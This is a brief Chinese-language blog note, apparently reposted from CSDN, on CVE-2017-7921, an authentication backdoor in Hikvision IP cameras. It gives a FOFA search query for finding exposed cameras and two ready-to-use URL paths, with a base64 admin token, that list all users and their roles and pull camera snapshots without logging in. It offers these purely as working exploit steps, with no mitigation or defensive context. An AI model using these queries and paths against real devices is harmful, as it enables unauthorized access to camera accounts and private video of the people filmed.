CVE-2017-7921

许多HikvisionIP摄像机包含一个后门,允许未经身份验证的模拟任何配置的用户帐户。

fofa搜索:body="©Hikvision Digital"

检索所有用户及其角色的列表:/Security/users?auth=YWRtaW46MTEK

获取相机快照而不进行身份验证:/onvif-http/snapshot?auth=YWRtaW46MTEK

猜你喜欢

转载自blog.csdn.net/qq_44159028/article/details/114593166